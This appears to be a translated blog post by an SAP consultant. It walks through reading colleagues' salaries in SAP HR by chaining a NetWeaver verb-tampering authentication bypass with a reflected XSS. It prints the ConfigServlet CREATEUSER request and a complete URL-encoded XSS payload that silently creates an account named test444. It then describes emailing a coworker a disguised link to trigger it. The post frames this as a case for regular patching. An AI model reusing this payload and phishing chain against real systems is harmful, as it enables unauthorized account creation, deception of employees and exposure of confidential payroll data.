SAP Security. Do you regularly update?

    If you work in a Forbes 500 list company , it is highly likely that your HR module is considered by SAP ERP module. I will show how, using SAP errors, see someone else’s salary in the SAP ERP system.

    Disclaimer : This is our first official post on Habré (we hope that this is not the last one), and we would like to start by highlighting one of the most important topics. The information in this post is for informational purposes only and demonstrates the criticality of security issues. In the article, we used two very old vulnerabilities. If the system is updated regularly with patches, such a scenario will be impossible.

    So, only HR employees have access to payroll data. Even if you have access to the SAP GUI, and you try to go into the transaction of viewing data on



    salary , then with a probability of 99% you will be denied: No access, but I want to see your salary. We are going to watch exploits for SAP. What tools do we have with exploits? Right, Metasploit. Google. Yeah, github has a whole daddy metasploit-framework / modules / auxiliary / scanner / sap /. Three dozen exploits, however:



    Here, for example, “Authentication bypass with Verb Tampering” (modules / auxiliary / scanner / sap / sap_ctc_verb_tampering_user_mgmt.rb), they wrote about it on Habré.

    Briefly, the essence of the vulnerability is that one of the admin services of the Java server, which is included in the SAP NetWeaver package, is accessible by a request of the HEAD type (as opposed to forbidden GET and POST requests). If you open github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb we see that the problem is accessing the servlet:

    /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=' + datastore['USERNAME'] + ',PASSWORD=' + datastore['PASSWORD']

    Of course, we can install Metasploit and run the script from the local computer . But:

    1. There is no access to the local network, and the service is most likely closed to access from outside
    2. The script will be launched on your behalf

    Therefore, come on, a) we’ll compose the script ourselves based on the sap_ctc_verb_tampering_user_mgmt.rb code b) we’ll let this colleague run this script using one of the XSS errors We

    've written about XSS on Habré many times (read habrahabr.ru/post/66057 two times habrahabr.ru/post/197672 )

    We google securityfocus. The query “sap xss exploit site: http: //www.securityfocus.com/” yields 359 results.



    By www.securityfocus.com/bid/15361/exploit we see a query that will execute Javascript on the user's computer: Instead of dummy, we will insert HEAD- request to / ctc / ConfigServlet And so that no one sees the results of the request, we will show the user a picture, always with seals:

    www.example.com/sap/bc/BSp/sap/menu/fameset.htm?sap-sessioncmd=open&sap-syscmd=%3Cscript%3Ealert('xss')%3C/script%3E








    The final link after encoding in the URL will look like this:

    www.example.com/sap/bc/BSp/sap/menu/fameset.htm?sap-sessioncmd=open&sap-syscmd= %3Cscript%3Evar%20http%20%3D%20new%20XMLHttpRequest()%3Bhttp.open(%27HEAD%27%2C%20%22http%3A%2F%2Fxxxxx%2Fctc%2FConfigServlet%3Fparam%3Dcom.sap.ctc.util.UserConfig%3BCREATEUSER%3BUSERNAME%3Dtest444%2CPASSWORD%3DPassword01%22)%3Bhttp.send()%3Bwindow.location.href%20%3D%20%27http%3A%2F%2Fru.fishki.net%2Fpicsw%2F042007%2F02%2Fflash%2Fcat.swf%27%3B%3C%2Fscript%3E%20

    So, we are writing a letter to colleagues:



    Nina Ivanovna plays a Flash game:



    And we get the user test444, which (if NetWeaver ABAP is activated as a user source) will be created not only on the NetWeaver Application Server Java, but also in the backend - NetWeaver Application Server ABAP.



    Login, check. HR module transaction works!



    Conclusions. We used two vulnerabilities in 2011 and 2009. If the system is updated regularly with patches, such a scenario will be impossible. Unfortunately, many marketers forget to check regularly at service.sap.com/securitynotesand check compliance with the latest patches, or do it irregularly. Since 2010, SAP has been organizing a Security Patch Day every second Tuesday of every month when security patches are mass released. SAP company asks partners not to publish or disclose information about vulnerabilities found for at least 3 months from the date of release of the patch. However, our studies show that many (including large) customers do not always install updates within 3 months.

    Posted by Daniil Luzin
    Consulting Division of SAP CIS LLC
    Kosmodamianskaya Emb. 52/7, 113054 Moscow
    T. +7 495 755 9800 ext. 3045
    M. +7 926 452 0425
    F. +7 495 755 98 01

    Update:Some people did not want to read the article beyond the title to understand its essence. In order not to mislead anyone, we decided to change the title reflecting the contents of the post.

    Also popular now: